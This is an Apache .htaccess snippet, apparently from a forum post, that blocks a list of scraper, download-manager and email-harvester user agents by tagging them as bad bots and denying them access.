SetEnvIfNoCase user-agent "^NaverBot" bad_bot
SetEnvIfNoCase user-agent "^Twiceler" bad_bot
SetEnvIfNoCase user-agent "^Yeti" bad_bot
SetEnvIfNoCase user-agent "^BlackWidow" bad_bot
SetEnvIfNoCase user-agent "^Bot\ mailto:craftbot@yahoo.com" bad_bot
SetEnvIfNoCase user-agent "^ChinaClaw" bad_bot
SetEnvIfNoCase user-agent "^Custo" bad_bot
SetEnvIfNoCase user-agent "^DISCo" bad_bot
SetEnvIfNoCase user-agent "^Download\ Demon" bad_bot
SetEnvIfNoCase user-agent "^eCatch" bad_bot
SetEnvIfNoCase user-agent "^EirGrabber" bad_bot
SetEnvIfNoCase user-agent "^EmailSiphon" bad_bot
SetEnvIfNoCase user-agent "^EmailWolf" bad_bot
SetEnvIfNoCase user-agent "^Express\ WebPictures" bad_bot
SetEnvIfNoCase user-agent "^ExtractorPro" bad_bot
SetEnvIfNoCase user-agent "^EyeNetIE" bad_bot
SetEnvIfNoCase user-agent "^FlashGet" bad_bot
SetEnvIfNoCase user-agent "^GetRight" bad_bot
SetEnvIfNoCase user-agent "^GetWeb!" bad_bot
SetEnvIfNoCase user-agent "^Go!Zilla" bad_bot
SetEnvIfNoCase user-agent "^Go-Ahead-Got-It" bad_bot
SetEnvIfNoCase user-agent "^GrabNet" bad_bot
SetEnvIfNoCase user-agent "^Grafula" bad_bot
SetEnvIfNoCase user-agent "^HMView" bad_bot
SetEnvIfNoCase user-agent "HTTrack" bad_bot
SetEnvIfNoCase user-agent "^Image\ Stripper" bad_bot
SetEnvIfNoCase user-agent "^Image\ Sucker" bad_bot
SetEnvIfNoCase user-agent "Indy\ Library" bad_bot
SetEnvIfNoCase user-agent "^InterGET" bad_bot
SetEnvIfNoCase user-agent "^Internet\ Ninja" bad_bot
SetEnvIfNoCase user-agent "^JetCar" bad_bot
SetEnvIfNoCase user-agent "^JOC\ Web\ Spider" bad_bot
SetEnvIfNoCase user-agent "^larbin" bad_bot
SetEnvIfNoCase user-agent "^LeechFTP" bad_bot
SetEnvIfNoCase user-agent "^Mass\ Downloader" bad_bot
SetEnvIfNoCase user-agent "^MIDown\ tool" bad_bot
SetEnvIfNoCase user-agent "^Mister\ PiX" bad_bot
SetEnvIfNoCase user-agent "^Navroad" bad_bot
SetEnvIfNoCase user-agent "^NearSite" bad_bot
SetEnvIfNoCase user-agent "^NetAnts" bad_bot
SetEnvIfNoCase user-agent "^NetSpider" bad_bot
SetEnvIfNoCase user-agent "^Net\ Vampire" bad_bot
SetEnvIfNoCase user-agent "^NetZIP" bad_bot
SetEnvIfNoCase user-agent "^Octopus" bad_bot
SetEnvIfNoCase user-agent "^Offline\ Explorer" bad_bot
SetEnvIfNoCase user-agent "^Offline\ Navigator" bad_bot
SetEnvIfNoCase user-agent "^Opera" bad_bot
SetEnvIfNoCase user-agent "^PageGrabber" bad_bot
SetEnvIfNoCase user-agent "^Papa\ Foto" bad_bot
SetEnvIfNoCase user-agent "^pavuk" bad_bot
SetEnvIfNoCase user-agent "^pcBrowser" bad_bot
SetEnvIfNoCase user-agent "^RealDownload" bad_bot
SetEnvIfNoCase user-agent "^ReGet" bad_bot
SetEnvIfNoCase user-agent "^SiteSnagger" bad_bot
SetEnvIfNoCase user-agent "^SmartDownload" bad_bot
SetEnvIfNoCase user-agent "^SuperBot" bad_bot
SetEnvIfNoCase user-agent "^SuperHTTP" bad_bot
SetEnvIfNoCase user-agent "^Surfbot" bad_bot
SetEnvIfNoCase user-agent "^tAkeOut" bad_bot
SetEnvIfNoCase user-agent "^Teleport\ Pro" bad_bot
SetEnvIfNoCase user-agent "^VoidEYE" bad_bot
SetEnvIfNoCase user-agent "^Web\ Image\ Collector" bad_bot
SetEnvIfNoCase user-agent "^Web\ Sucker" bad_bot
SetEnvIfNoCase user-agent "^WebAuto" bad_bot
SetEnvIfNoCase user-agent "^WebCopier" bad_bot
SetEnvIfNoCase user-agent "^WebFetch" bad_bot
SetEnvIfNoCase user-agent "^WebGo\ IS" bad_bot
SetEnvIfNoCase user-agent "^WebLeacher" bad_bot
SetEnvIfNoCase user-agent "^WebReaper" bad_bot
SetEnvIfNoCase user-agent "^WebSauger" bad_bot
SetEnvIfNoCase user-agent "^Website\ eXtractor" bad_bot
SetEnvIfNoCase user-agent "^Website\ Quester" bad_bot
SetEnvIfNoCase user-agent "^WebStripper" bad_bot
SetEnvIfNoCase user-agent "^WebWhacker" bad_bot
SetEnvIfNoCase user-agent "^WebZIP" bad_bot
SetEnvIfNoCase user-agent "^Wget" bad_bot
SetEnvIfNoCase user-agent "^wget" bad_bot
SetEnvIfNoCase user-agent "^Widow" bad_bot
SetEnvIfNoCase user-agent "^WWWOFFLE" bad_bot
SetEnvIfNoCase user-agent "^Xaldon\ WebSpider" bad_bot
SetEnvIfNoCase user-agent "^Zeus" bad_bot

Order Allow,Deny
Allow from All
Deny from env=bad_bot
 
All times are GMT - 6 Hours
 